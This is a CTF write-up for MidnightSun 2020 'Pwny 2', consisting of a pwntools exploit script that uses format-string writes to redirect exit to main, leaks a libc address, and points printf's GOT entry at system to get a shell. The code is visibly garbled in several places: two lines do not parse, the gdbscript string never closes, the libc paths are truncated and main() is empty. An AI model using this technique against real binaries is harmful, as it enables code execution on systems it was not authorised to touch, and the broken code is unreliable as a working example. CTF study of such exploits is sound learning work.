MidnightSun CTF 2020 - Pwny 2 write-up
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
# pwntools run-time setup for this write-up: gdb windows open in a horizontal
# tmux split, and the challenge binary is also registered as context.binary
# so pwntools picks up its architecture/bits.
context.terminal = ["tmux", "splitw", "-h"]
exe = ELF("./challenge")
context.binary = exe
# Target endpoint from the pwntools command-line args (HOST=... PORT=...).
# HOST falls back to the empty string, PORT to 10002.
host = args.HOST if args.HOST else ""
port = int(args.PORT) if args.PORT else 10002
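def local(argv=None, *a, **kw):
    """Execute the target binary locally.

    argv: extra command-line arguments appended after the binary path.
        Defaults to none; the previous shared-list default (``[]``) is
        replaced by an immutable one so no call can alias another's list.
    *a, **kw: passed straight through to gdb.debug() / process().
    Returns the pwntools tube of the new process. With GDB=1 on the command
    line the process is started under gdb using the module-level
    ``gdbscript`` (defined further down the file).
    """
    # Copy whatever the caller gave us so the command vector never aliases
    # a caller-owned list; also accepts tuples, which ``+`` would reject.
    argv = list(argv) if argv else []
    command = [exe.path] + argv
    if args.GDB:
        return gdb.debug(command, gdbscript=gdbscript, *a, **kw)
    return process(command, *a, **kw)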
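def remote(argv=None, *a, **kw):
    """Connect to the process on the remote host.

    NOTE: this definition shadows pwntools' own ``remote`` brought in by
    ``from pwn import *``. The connection goes through ``connect``, which
    pwntools exposes as an alias of the tube class, so the shadowing is
    harmless here, but the name is a trap for anyone extending the script.
    argv: accepted only for signature symmetry with local(); a remote
        service cannot be given arguments, so it is ignored.
    Returns the connected tube; with GDB=1 a debugger is attached first
    using the module-level ``gdbscript``.
    Raises ValueError when no HOST was supplied, instead of handing an
    empty hostname to the socket layer and failing with a less clear error.
    """
    if not host:
        raise ValueError("HOST is required for a remote run (pass HOST=<addr>)")
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io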
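def start(argv=None, *a, **kw):
    """Start the exploit against the target.

    argv: extra arguments for a local run (ignored on the remote path).
    *a, **kw: forwarded to local() / remote().
    Returns a ``(tube, libc)`` pair. LOCAL=1 on the command line runs the
    binary locally and loads a libc from /usr/lib32 (presumably the
    system's 32-bit one); otherwise it connects to HOST:PORT and loads a
    libc from the current directory.
    """
    # Normalise to a list before handing it on, so the helpers always
    # receive the type their ``[exe.path] + argv`` concatenation expects.
    argv = list(argv) if argv else []
    if args.LOCAL:
        # NOTE(review): this path looks truncated by extraction — it names a
        # directory and ELF() expects a file. Confirm the libc filename.
        return local(argv, *a, **kw), ELF("/usr/lib32/")
    # NOTE(review): same here — "./" is a directory; the challenge libc's
    # filename was presumably lost from the page.
    return remote(argv, *a, **kw), ELF("./")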
gdbscript = """
b *0x08048688
# -- Exploit goes here --
smain = 0x080485F5
def do(i):
    """Run the exploit once against a fresh target obtained from start().

    i: not used in the visible body — presumably a run counter passed by
       main(), whose body is not on the page. TODO confirm.
    Relies on the module-level start() and smain, plus the pwntools names
    brought in by ``from pwn import *`` (fmtstr_payload, ELF, ...).
    """
    # NOTE(review): this line is garbled by extraction — the tokens between
    # start() and the string literal (most likely a log call and the object
    # indexed by ["exit"]) were lost, so it does not parse as written.
    io, libc = start()"exit @ 0x{:08x}".format(["exit"]))
    # First write: store smain at the address keyed by ["exit"]. The object
    # being indexed was lost in extraction (see the garbled line above).
    writes = {["exit"]: smain}
    # Format-string payload performing `writes`; the positional 7 is the
    # argument offset fmtstr_payload() expects, writes are short-sized.
    payload = fmtstr_payload(7, writes, numbwritten=0, write_size="short")
    io.sendlineafter("input: ", payload)
    # Second round: ask the program to print its second format argument as
    # zero-padded hex ...
    payload = ""
    payload += "%2$08x"
    io.sendlineafter("input: ", payload)
    # ... and read it back as an int; the write-up treats it as the address
    # of _IO_2_1_stdin_ inside libc.
    _IO_2_1_stdin_ = int(io.recvline(), 16)
    # Rebase the libc ELF from the leaked symbol so its other symbols resolve.
    libc.address = _IO_2_1_stdin_ - libc.symbols["_IO_2_1_stdin_"]
    # NOTE(review): also garbled — the search call that produces `binsh` and
    # several log calls were run together on one line; only the string
    # literals survived intact, so this line does not parse as written.
    binsh ="/bin/sh").next()"_IO_2_1_stdin_ @ 0x{:08x}".format(libc.symbols["_IO_2_1_stdin_"]))"Libc @ 0x{:08x}".format(libc.address))"system @ 0x{:08x}".format(libc.symbols["system"]))"/bin/sh @ 0x{:08x}".format(binsh))
    # Third write: point the entry keyed by ["printf"] at libc's system();
    # same lost-object caveat as the first write.
    writes = {["printf"]: libc.symbols["system"]}
    payload = fmtstr_payload(7, writes, numbwritten=0, write_size="short")
    io.sendlineafter("input: ", payload)
def main():
if __name__ == "__main__":